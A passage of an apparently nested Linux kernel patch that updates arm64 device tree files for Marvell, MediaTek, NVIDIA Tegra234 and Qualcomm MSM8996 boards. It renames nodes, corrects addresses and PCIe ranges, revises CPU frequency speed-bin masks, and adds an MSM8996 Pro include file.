+ 			#iommu-cells = <1>;
+diff --git a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+index ada164d423f3d..200f97e1c4c9c 100644
+--- a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
++++ b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+@@ -125,9 +125,12 @@
+ 	/delete-property/ mrvl,i2c-fast-mode;
+ 	status = "okay";
+ 
++	/* MCP7940MT-I/MNY RTC */
+ 	rtc@6f {
+ 		compatible = "microchip,mcp7940x";
+ 		reg = <0x6f>;
++		interrupt-parent = <&gpiosb>;
++		interrupts = <5 0>; /* GPIO2_5 */
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+index 9b1af9c801308..d31a194124c91 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+@@ -26,14 +26,14 @@
+ 		stdout-path = "serial0:921600n8";
+ 	};
+ 
+-	cpus_fixed_vproc0: fixedregulator@0 {
++	cpus_fixed_vproc0: regulator-vproc-buck0 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vproc_buck0";
+ 		regulator-min-microvolt = <1000000>;
+ 		regulator-max-microvolt = <1000000>;
+ 	};
+ 
+-	cpus_fixed_vproc1: fixedregulator@1 {
++	cpus_fixed_vproc1: regulator-vproc-buck1 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vproc_buck1";
+ 		regulator-min-microvolt = <1000000>;
+@@ -50,7 +50,7 @@
+ 		id-gpio = <&pio 14 GPIO_ACTIVE_HIGH>;
+ 	};
+ 
+-	usb_p0_vbus: regulator@2 {
++	usb_p0_vbus: regulator-usb-p0-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p0_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -59,7 +59,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p1_vbus: regulator@3 {
++	usb_p1_vbus: regulator-usb-p1-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p1_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -68,7 +68,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p2_vbus: regulator@4 {
++	usb_p2_vbus: regulator-usb-p2-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p2_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -77,7 +77,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p3_vbus: regulator@5 {
++	usb_p3_vbus: regulator-usb-p3-vbus {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "p3_vbus";
+ 		regulator-min-microvolt = <5000000>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+index e6d7453e56e0e..1ac0b2cf3d406 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+@@ -160,70 +160,70 @@
+ 		#clock-cells = <0>;
+ 	};
+ 
+-	clk26m: oscillator@0 {
++	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <26000000>;
+ 		clock-output-names = "clk26m";
+ 	};
+ 
+-	clk32k: oscillator@1 {
++	clk32k: oscillator-32k {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <32768>;
+ 		clock-output-names = "clk32k";
+ 	};
+ 
+-	clkfpc: oscillator@2 {
++	clkfpc: oscillator-50m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <50000000>;
+ 		clock-output-names = "clkfpc";
+ 	};
+ 
+-	clkaud_ext_i_0: oscillator@3 {
++	clkaud_ext_i_0: oscillator-aud0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <6500000>;
+ 		clock-output-names = "clkaud_ext_i_0";
+ 	};
+ 
+-	clkaud_ext_i_1: oscillator@4 {
++	clkaud_ext_i_1: oscillator-aud1 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <196608000>;
+ 		clock-output-names = "clkaud_ext_i_1";
+ 	};
+ 
+-	clkaud_ext_i_2: oscillator@5 {
++	clkaud_ext_i_2: oscillator-aud2 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <180633600>;
+ 		clock-output-names = "clkaud_ext_i_2";
+ 	};
+ 
+-	clki2si0_mck_i: oscillator@6 {
++	clki2si0_mck_i: oscillator-i2s0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+ 		clock-output-names = "clki2si0_mck_i";
+ 	};
+ 
+-	clki2si1_mck_i: oscillator@7 {
++	clki2si1_mck_i: oscillator-i2s1 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+ 		clock-output-names = "clki2si1_mck_i";
+ 	};
+ 
+-	clki2si2_mck_i: oscillator@8 {
++	clki2si2_mck_i: oscillator-i2s2 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+ 		clock-output-names = "clki2si2_mck_i";
+ 	};
+ 
+-	clktdmin_mclk_i: oscillator@9 {
++	clktdmin_mclk_i: oscillator-mclk {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <30000000>;
+@@ -266,7 +266,7 @@
+ 		reg = <0 0x10005000 0 0x1000>;
+ 	};
+ 
+-	pio: pinctrl@10005000 {
++	pio: pinctrl@1000b000 {
+ 		compatible = "mediatek,mt2712-pinctrl";
+ 		reg = <0 0x1000b000 0 0x1000>;
+ 		mediatek,pctl-regmap = <&syscfg_pctl_a>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt6779.dtsi b/arch/arm64/boot/dts/mediatek/mt6779.dtsi
+index 9bdf5145966c5..dde9ce137b4f1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt6779.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt6779.dtsi
+@@ -88,14 +88,14 @@
+ 		interrupts = <GIC_PPI 7 IRQ_TYPE_LEVEL_LOW 0>;
+ 	};
+ 
+-	clk26m: oscillator@0 {
++	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <26000000>;
+ 		clock-output-names = "clk26m";
+ 	};
+ 
+-	clk32k: oscillator@1 {
++	clk32k: oscillator-32k {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <32768>;
+@@ -117,7 +117,7 @@
+ 		compatible = "simple-bus";
+ 		ranges;
+ 
+-		gic: interrupt-controller@0c000000 {
++		gic: interrupt-controller@c000000 {
+ 			compatible = "arm,gic-v3";
+ 			#interrupt-cells = <4>;
+ 			interrupt-parent = <&gic>;
+@@ -138,7 +138,7 @@
+ 
+ 		};
+ 
+-		sysirq: intpol-controller@0c53a650 {
++		sysirq: intpol-controller@c53a650 {
+ 			compatible = "mediatek,mt6779-sysirq",
+ 				     "mediatek,mt6577-sysirq";
+ 			interrupt-controller;
+diff --git a/arch/arm64/boot/dts/mediatek/mt6797.dtsi b/arch/arm64/boot/dts/mediatek/mt6797.dtsi
+index 15616231022a2..c3677d77e0a45 100644
+--- a/arch/arm64/boot/dts/mediatek/mt6797.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt6797.dtsi
+@@ -95,7 +95,7 @@
+ 		};
+ 	};
+ 
+-	clk26m: oscillator@0 {
++	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+ 		clock-frequency = <26000000>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index 72e0d9722e07a..35e01fa2d314b 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -14,7 +14,7 @@
+ 	#address-cells = <2>;
+ 	#size-cells = <2>;
+ 
+-	clk40m: oscillator@0 {
++	clk40m: oscillator-40m {
+ 		compatible = "fixed-clock";
+ 		clock-frequency = <40000000>;
+ 		#clock-cells = <0>;
+@@ -112,6 +112,12 @@
+ 			#clock-cells = <1>;
+ 		};
+ 
++		wed_pcie: wed-pcie@10003000 {
++			compatible = "mediatek,mt7986-wed-pcie",
++				     "syscon";
++			reg = <0 0x10003000 0 0x10>;
++		};
++
+ 		topckgen: topckgen@1001b000 {
+ 			compatible = "mediatek,mt7986-topckgen", "syscon";
+ 			reg = <0 0x1001B000 0 0x1000>;
+@@ -168,7 +174,7 @@
+ 			#clock-cells = <1>;
+ 		};
+ 
+-		trng: trng@1020f000 {
++		trng: rng@1020f000 {
+ 			compatible = "mediatek,mt7986-rng",
+ 				     "mediatek,mt7623-rng";
+ 			reg = <0 0x1020f000 0 0x100>;
+@@ -228,12 +234,6 @@
+ 			 #reset-cells = <1>;
+ 		};
+ 
+-		wed_pcie: wed-pcie@10003000 {
+-			compatible = "mediatek,mt7986-wed-pcie",
+-				     "syscon";
+-			reg = <0 0x10003000 0 0x10>;
+-		};
+-
+ 		wed0: wed@15010000 {
+ 			compatible = "mediatek,mt7986-wed",
+ 				     "syscon";
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index a70b669c49baa..402136bfd5350 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1678,7 +1678,7 @@
+ 				<GIC_SPI 278 IRQ_TYPE_LEVEL_LOW>;
+ 			interrupt-names = "job", "mmu", "gpu";
+ 
+-			clocks = <&topckgen CLK_TOP_MFGPLL_CK>;
++			clocks = <&mfgcfg CLK_MFG_BG3D>;
+ 
+ 			power-domains =
+ 				<&spm MT8183_POWER_DOMAIN_MFG_CORE0>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 905d1a90b406c..0b85b5874a4f9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -36,7 +36,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+@@ -49,7 +49,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+@@ -62,7 +62,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+@@ -75,7 +75,7 @@
+ 			enable-method = "psci";
+ 			performance-domains = <&performance 0>;
+ 			clock-frequency = <1701000000>;
+-			capacity-dmips-mhz = <578>;
++			capacity-dmips-mhz = <308>;
+ 			cpu-idle-states = <&cpu_off_l &cluster_off_l>;
+ 			next-level-cache = <&l2_0>;
+ 			#cooling-cells = <2>;
+diff --git a/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi b/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi
+index 8ee1529683a34..ec8dfb3d1c6d6 100644
+--- a/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi
++++ b/arch/arm64/boot/dts/mediatek/pumpkin-common.dtsi
+@@ -17,7 +17,7 @@
+ 	};
+ 
+ 	firmware {
+-		optee: optee@4fd00000 {
++		optee: optee {
+ 			compatible = "linaro,optee-tz";
+ 			method = "smc";
+ 		};
+@@ -209,7 +209,7 @@
+ 		};
+ 	};
+ 
+-	i2c0_pins_a: i2c0@0 {
++	i2c0_pins_a: i2c0 {
+ 		pins1 {
+ 			pinmux = <MT8516_PIN_58_SDA0__FUNC_SDA0_0>,
+ 				 <MT8516_PIN_59_SCL0__FUNC_SCL0_0>;
+@@ -217,7 +217,7 @@
+ 		};
+ 	};
+ 
+-	i2c2_pins_a: i2c2@0 {
++	i2c2_pins_a: i2c2 {
+ 		pins1 {
+ 			pinmux = <MT8516_PIN_60_SDA2__FUNC_SDA2_0>,
+ 				 <MT8516_PIN_61_SCL2__FUNC_SCL2_0>;
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234.dtsi b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+index 0170bfa8a4679..dfe2cf2f4b218 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+@@ -1965,7 +1965,7 @@
+ 
+ 		bus-range = <0x0 0xff>;
+ 
+-		ranges = <0x43000000 0x35 0x40000000 0x35 0x40000000 0x2 0xe8000000>, /* prefetchable memory (11904 MB) */
++		ranges = <0x43000000 0x35 0x40000000 0x35 0x40000000 0x2 0xc0000000>, /* prefetchable memory (11264 MB) */
+ 			 <0x02000000 0x0  0x40000000 0x38 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x2c100000 0x00 0x2c100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+@@ -2178,7 +2178,7 @@
+ 		bus-range = <0x0 0xff>;
+ 
+ 		ranges = <0x43000000 0x21 0x00000000 0x21 0x00000000 0x0 0x28000000>, /* prefetchable memory (640 MB) */
+-			 <0x02000000 0x0  0x40000000 0x21 0xe8000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
++			 <0x02000000 0x0  0x40000000 0x21 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x34100000 0x00 0x34100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+ 		interconnects = <&mc TEGRA234_MEMORY_CLIENT_PCIE3R &emc>,
+@@ -2336,7 +2336,7 @@
+ 
+ 		bus-range = <0x0 0xff>;
+ 
+-		ranges = <0x43000000 0x27 0x40000000 0x27 0x40000000 0x3 0xe8000000>, /* prefetchable memory (16000 MB) */
++		ranges = <0x43000000 0x28 0x00000000 0x28 0x00000000 0x3 0x28000000>, /* prefetchable memory (12928 MB) */
+ 			 <0x02000000 0x0  0x40000000 0x2b 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x3a100000 0x00 0x3a100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+@@ -2442,7 +2442,7 @@
+ 
+ 		bus-range = <0x0 0xff>;
+ 
+-		ranges = <0x43000000 0x2e 0x40000000 0x2e 0x40000000 0x3 0xe8000000>, /* prefetchable memory (16000 MB) */
++		ranges = <0x43000000 0x30 0x00000000 0x30 0x00000000 0x2 0x28000000>, /* prefetchable memory (8832 MB) */
+ 			 <0x02000000 0x0  0x40000000 0x32 0x28000000 0x0 0x08000000>, /* non-prefetchable memory (128 MB) */
+ 			 <0x01000000 0x0  0x3e100000 0x00 0x3e100000 0x0 0x00100000>; /* downstream I/O (1 MB) */
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts b/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts
+index 1ba2eca33c7b6..6a716c83e5f1d 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts
++++ b/arch/arm64/boot/dts/qcom/ipq6018-cp01-c1.dts
+@@ -37,6 +37,8 @@
+ 
+ &blsp1_spi1 {
+ 	cs-select = <0>;
++	pinctrl-0 = <&spi_0_pins>;
++	pinctrl-names = "default";
+ 	status = "okay";
+ 
+ 	flash@0 {
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index a831064700ee8..9743cb270639d 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1345,7 +1345,7 @@
+ 		};
+ 
+ 		mpss: remoteproc@4080000 {
+-			compatible = "qcom,msm8916-mss-pil", "qcom,q6v5-pil";
++			compatible = "qcom,msm8916-mss-pil";
+ 			reg = <0x04080000 0x100>,
+ 			      <0x04020000 0x040>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index aba7176443919..1107befc3b091 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -144,82 +144,92 @@
+ 		/* Nominal fmax for now */
+ 		opp-307200000 {
+ 			opp-hz = /bits/ 64 <307200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-422400000 {
+ 			opp-hz = /bits/ 64 <422400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-480000000 {
+ 			opp-hz = /bits/ 64 <480000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-556800000 {
+ 			opp-hz = /bits/ 64 <556800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-652800000 {
+ 			opp-hz = /bits/ 64 <652800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-729600000 {
+ 			opp-hz = /bits/ 64 <729600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-844800000 {
+ 			opp-hz = /bits/ 64 <844800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-960000000 {
+ 			opp-hz = /bits/ 64 <960000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1036800000 {
+ 			opp-hz = /bits/ 64 <1036800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1113600000 {
+ 			opp-hz = /bits/ 64 <1113600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1190400000 {
+ 			opp-hz = /bits/ 64 <1190400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1228800000 {
+ 			opp-hz = /bits/ 64 <1228800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1324800000 {
+ 			opp-hz = /bits/ 64 <1324800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x5>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1363200000 {
++			opp-hz = /bits/ 64 <1363200000>;
++			opp-supported-hw = <0x2>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1401600000 {
+ 			opp-hz = /bits/ 64 <1401600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x5>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1478400000 {
+ 			opp-hz = /bits/ 64 <1478400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1497600000 {
++			opp-hz = /bits/ 64 <1497600000>;
++			opp-supported-hw = <0x04>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1593600000 {
+ 			opp-hz = /bits/ 64 <1593600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 	};
+@@ -232,127 +242,137 @@
+ 		/* Nominal fmax for now */
+ 		opp-307200000 {
+ 			opp-hz = /bits/ 64 <307200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-403200000 {
+ 			opp-hz = /bits/ 64 <403200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-480000000 {
+ 			opp-hz = /bits/ 64 <480000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-556800000 {
+ 			opp-hz = /bits/ 64 <556800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-652800000 {
+ 			opp-hz = /bits/ 64 <652800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-729600000 {
+ 			opp-hz = /bits/ 64 <729600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-806400000 {
+ 			opp-hz = /bits/ 64 <806400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-883200000 {
+ 			opp-hz = /bits/ 64 <883200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-940800000 {
+ 			opp-hz = /bits/ 64 <940800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1036800000 {
+ 			opp-hz = /bits/ 64 <1036800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1113600000 {
+ 			opp-hz = /bits/ 64 <1113600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1190400000 {
+ 			opp-hz = /bits/ 64 <1190400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1248000000 {
+ 			opp-hz = /bits/ 64 <1248000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1324800000 {
+ 			opp-hz = /bits/ 64 <1324800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1401600000 {
+ 			opp-hz = /bits/ 64 <1401600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1478400000 {
+ 			opp-hz = /bits/ 64 <1478400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1555200000 {
+ 			opp-hz = /bits/ 64 <1555200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1632000000 {
+ 			opp-hz = /bits/ 64 <1632000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1708800000 {
+ 			opp-hz = /bits/ 64 <1708800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1785600000 {
+ 			opp-hz = /bits/ 64 <1785600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1804800000 {
++			opp-hz = /bits/ 64 <1804800000>;
++			opp-supported-hw = <0x6>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1824000000 {
+ 			opp-hz = /bits/ 64 <1824000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1900800000 {
++			opp-hz = /bits/ 64 <1900800000>;
++			opp-supported-hw = <0x4>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1920000000 {
+ 			opp-hz = /bits/ 64 <1920000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1996800000 {
+ 			opp-hz = /bits/ 64 <1996800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-2073600000 {
+ 			opp-hz = /bits/ 64 <2073600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-2150400000 {
+ 			opp-hz = /bits/ 64 <2150400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 	};
+@@ -1213,17 +1233,17 @@
+ 				compatible = "operating-points-v2";
+ 
+ 				/*
+-				 * 624Mhz and 560Mhz are only available on speed
+-				 * bin (1 << 0). All the rest are available on
+-				 * all bins of the hardware
++				 * 624Mhz is only available on speed bins 0 and 3.
++				 * 560Mhz is only available on speed bins 0, 2 and 3.
++				 * All the rest are available on all bins of the hardware.
+ 				 */
+ 				opp-624000000 {
+ 					opp-hz = /bits/ 64 <624000000>;
+-					opp-supported-hw = <0x01>;
++					opp-supported-hw = <0x09>;
+ 				};
+ 				opp-560000000 {
+ 					opp-hz = /bits/ 64 <560000000>;
+-					opp-supported-hw = <0x01>;
++					opp-supported-hw = <0x0d>;
+ 				};
+ 				opp-510000000 {
+ 					opp-hz = /bits/ 64 <510000000>;
+@@ -3342,7 +3362,7 @@
+ 					interrupt-names = "intr1", "intr2";
+ 					interrupt-controller;
+ 					#interrupt-cells = <1>;
+-					reset-gpios = <&tlmm 64 GPIO_ACTIVE_HIGH>;
++					reset-gpios = <&tlmm 64 GPIO_ACTIVE_LOW>;
+ 
+ 					slim-ifc-dev = <&tasha_ifd>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996pro.dtsi b/arch/arm64/boot/dts/qcom/msm8996pro.dtsi
+new file mode 100644
+index 0000000000000..63e1b4ec7a360
+--- /dev/null
++++ b/arch/arm64/boot/dts/qcom/msm8996pro.dtsi
+@@ -0,0 +1,266 @@
++// SPDX-License-Identifier: BSD-3-Clause
++/*
++ * Copyright (c) 2022, Linaro Limited
++ */
++
++#include "msm8996.dtsi"
++
++/ {
++	/delete-node/ opp-table-cluster0;
++	/delete-node/ opp-table-cluster1;
++
++	/*
++	 * On MSM8996 Pro the cpufreq driver shifts speed bins into the high
++	 * nibble of supported hw, so speed bin 0 becomes 0x10, speed bin 1
++	 * becomes 0x20, speed 2 becomes 0x40.
++	 */
++
++	cluster0_opp: opp-table-cluster0 {
++		compatible = "operating-points-v2-kryo-cpu";
++		nvmem-cells = <&speedbin_efuse>;
++		opp-shared;
++
++		opp-307200000 {
++			opp-hz = /bits/ 64 <307200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-384000000 {
++			opp-hz = /bits/ 64 <384000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-460800000 {
++			opp-hz = /bits/ 64 <460800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-537600000 {
++			opp-hz = /bits/ 64 <537600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-614400000 {
++			opp-hz = /bits/ 64 <614400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-691200000 {
++			opp-hz = /bits/ 64 <691200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-768000000 {
++			opp-hz = /bits/ 64 <768000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-844800000 {
++			opp-hz = /bits/ 64 <844800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-902400000 {
++			opp-hz = /bits/ 64 <902400000>;
